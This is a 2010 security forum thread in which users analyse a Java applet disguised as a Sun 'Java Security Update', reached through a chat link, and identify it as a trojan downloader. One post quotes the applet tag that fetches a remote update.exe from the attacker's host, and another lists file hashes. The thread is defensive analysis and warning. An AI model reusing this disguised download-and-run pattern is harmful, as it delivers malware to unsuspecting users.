Another Java security question. 'Publisher' field.

Discussion in 'other software & services' started by Eagle Creek, Nov 21, 2010.

Thread Status:
Not open for further replies.
  1. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Hi.

    About a week ago I received a chat message from an acquaintance of mine. His chat window also contained a link, which I clicked.

    It brought me to a website which launched a Java applet.
    https://www.wilderssecurity.com/attachment.php?attachmentid=223568&stc=1&d=1290352126

    --
    I didn't run the applet, although I almost did. Except for the AVG warning (which at first didn't pop up), I noticed the file was coming from a German website. The Publisher however is "Sun Java MicroSystems", but it wasn't verified. This is pretty likely to mislead users.

    Has anyone of you seen this before? Or know someone who might have clicked it?

    https://www.wilderssecurity.com/attachment.php?attachmentid=223569&stc=1&d=1290352194
     

    Attached Files:

    Eagle Creek, Nov 21, 2010
    #1
  2. vtol

    vtol Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    774
    Location:
    just around the next corner
    -burnerclan.bu.funpic.de/intern/admin/cp2/index.html-

    after a while getting redirected through JS

    applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">

    <param name='file' value="-http://burnerclan.bu.funpic.de/intern/admin/update.exe-">


    21-11-2010 17-04-11.png
     
    Last edited: Nov 21, 2010
    vtol, Nov 21, 2010
    #2
  3. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    m00nbl00d, Nov 21, 2010
    #3
  4. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    That could be because LinkScanner won't actually scan domain and sub-domains at the same time; it only scans the page you're on, which is why when you got redirected to the index.html page it blocked it.
     
    m00nbl00d, Nov 21, 2010
    #4
  5. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I bet Eagle Creek's LinkScanner is going crazy right now, due to this code. Most likely it is blocking is access to full thread. :D
     
    m00nbl00d, Nov 21, 2010
    #5
  6. vtol

    vtol Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    774
    Location:
    just around the next corner
    this may have been an attempt to run code but it fails as the -burnerclan.bu.funpic.de/intern/admin/update.exe- is currently not available at the location
     
    vtol, Nov 21, 2010
    #6
  7. vtol

    vtol Registered Member

    Joined:
    Apr 8, 2010
    Posts:
    774
    Location:
    just around the next corner
    the JS file got classified

    Sun_Microsystems_Java_Security_Update_6.class - probably a variant of Win32/TrojanDownloader.Agent.ESKWMEL trojan

    MD5 : 3d76ae89d24ece60549f3f7b57ffbc63
    SHA1 : c887bd78e3eaed6ec8a47d96abada8ffc70b8374
    SHA256: ee9a15dada830f914580e8aaa0ea6191bc63773f53a174774b99a4f816f12c77
     
    Last edited: Nov 21, 2010
    vtol, Nov 21, 2010
    #7
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...